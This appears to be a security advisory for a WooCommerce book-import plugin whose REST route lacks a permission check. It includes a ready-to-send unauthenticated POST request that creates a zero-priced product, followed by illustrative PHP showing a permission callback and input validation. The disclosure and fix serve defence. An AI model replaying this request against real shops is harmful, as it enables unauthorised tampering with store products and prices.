The plugin did not correctly check for permission in its wc/v3/bcsbertlinebookimport REST route, allowing unauthenticated users to import arbitrary products or update existing ones.

POST /wp-json/wc/v3/bcsbertlinebookimport HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 200
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<books><book><isbn>123</isbn><title>Malicious Product</title><content>YOLO</content><price>0</price><stock>2</stock></book></books>
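
One way a route like this is locked down, shown as an added example that is not the plugin's own code: the route gets a `permission_callback` that requires a shop-management capability, and the handler validates each `<book>` entry. The function names `bcs_import_books` and `bcs_import_permission_check`, and the choice of the `manage_woocommerce` capability, are assumptions.

```php
<?php
// Added illustration, not the plugin's source. Both function names and
// the manage_woocommerce requirement are assumptions for this example.
add_action( 'rest_api_init', function () {
    register_rest_route( 'wc/v3', '/bcsbertlinebookimport', array(
        'methods'             => WP_REST_Server::CREATABLE, // POST only
        'callback'            => 'bcs_import_books',
        // Without a real check here (for example '__return_true'),
        // unauthenticated requests reach the callback.
        'permission_callback' => 'bcs_import_permission_check',
    ) );
} );

// Runs before the callback; rejects anyone who cannot manage the shop.
function bcs_import_permission_check( WP_REST_Request $request ) {
    if ( current_user_can( 'manage_woocommerce' ) ) {
        return true;
    }
    return new WP_Error(
        'rest_forbidden',
        'You are not allowed to import products.',
        array( 'status' => rest_authorization_required_code() ) // 401 or 403
    );
}

function bcs_import_books( WP_REST_Request $request ) {
    // LIBXML_NONET keeps the parser from fetching network resources.
    $xml = simplexml_load_string( $request->get_body(), 'SimpleXMLElement', LIBXML_NONET );
    if ( false === $xml ) {
        return new WP_Error( 'bad_xml', 'Body is not valid XML.', array( 'status' => 400 ) );
    }
    $accepted = array();
    foreach ( $xml->book as $book ) {
        $isbn  = sanitize_text_field( (string) $book->isbn );
        $price = (string) $book->price;
        // Skip entries with no ISBN or a non-numeric / negative price.
        if ( '' === $isbn || ! is_numeric( $price ) || (float) $price < 0 ) {
            continue;
        }
        $accepted[] = array(
            'isbn'  => $isbn,
            'title' => sanitize_text_field( (string) $book->title ),
            'price' => wc_format_decimal( $price ),
            'stock' => absint( (string) $book->stock ),
        );
    }
    // Creating or updating the WooCommerce products from $accepted goes here.
    return rest_ensure_response( array( 'accepted' => count( $accepted ) ) );
}
```

With this in place, a request without valid credentials is rejected by the REST server with 401 before `bcs_import_books` runs.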